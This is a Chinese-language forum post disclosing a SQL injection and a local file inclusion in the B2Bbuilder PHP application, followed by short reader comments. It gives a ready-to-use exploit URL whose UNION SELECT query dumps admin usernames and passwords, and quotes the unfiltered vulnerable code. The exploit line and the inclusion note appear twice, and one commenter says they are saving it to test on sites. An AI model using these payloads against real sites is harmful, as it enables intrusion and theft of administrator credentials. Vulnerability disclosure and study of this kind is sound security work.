B2Bbuilder php SQL inj
wap/index.phpnews_cat.php文件随便一条错误的语句即可得到数据库前缀
exp:http://site/b2b/wap/index.php?action=news_cat&nid=17%20and%201=2%20uNion%20select%201,concat(0x7E217E21,user,0x3A,password,0x7E217E21),3,4,5,6,7,8%20FROM%20数据库前缀_admin
本地包含。受限magic_quotes_gpc
module/news/admin/newscat.php
if (!empty($_GET["action"]))
$action=$_GET["action"];
else
$action="home";
//$action=empty($action)?"home":$_GET["action"];
//===============================
if(in_array($action, array('home','offer_cat','offer_list','offer_detail','product_cat','product_list','product_detail','news_cat','news_list','news_detail','corporate_cat','corporate_list','corporate_detail','search','corporate_moredetail','product_showimg')))
{
require'inc/'.$action.'.php';
}
if(!empty($_GET['nid']))
{
$nid=$_GET['nid'];
$sql="select * from ".NEWSCAT." where pid=$nid";
$db->query($sql);
$sre=$db->getRows();
if(count($sre)>0)
{
foreach($sre as $v)
{
echo "[资讯]<a href='?action=news_list&newsid=".$v['catid']."'>".$v['cat']."</a><br/>";
}
echo "<br/> <a href='?action=news_cat'><i>返回</i></a><br/>";
//echo " <anchor>后退<prev/></anchor><br/>";
}
else
{
header("Location:./?action=news_list&nid=".$nid);
exit();
}
}
exp:http://site/b2b/wap/index.php?action=news_cat&nid=17%20and%201=2%20uNion%20select%201,concat(0x7E217E21,user,0x3A,password,0x7E217E21),3,4,5,6,7,8%20FROM%20数据库前缀_admin
本地包含。受限magic_quotes_gpc
module/news/admin/newscat.php
include_once("../module/".$_GET['m']."/includes/news_function.php");
评论8次
收藏一下,遇到的时候可以测试一下!!!
都没过滤~~~~
不错,学xi了
来学xi的
想不到这程序也有如些的注入,真是佩服佩服~~包含注入,好样的~
这程序啊 这么赤果果的注入
不错
学xi了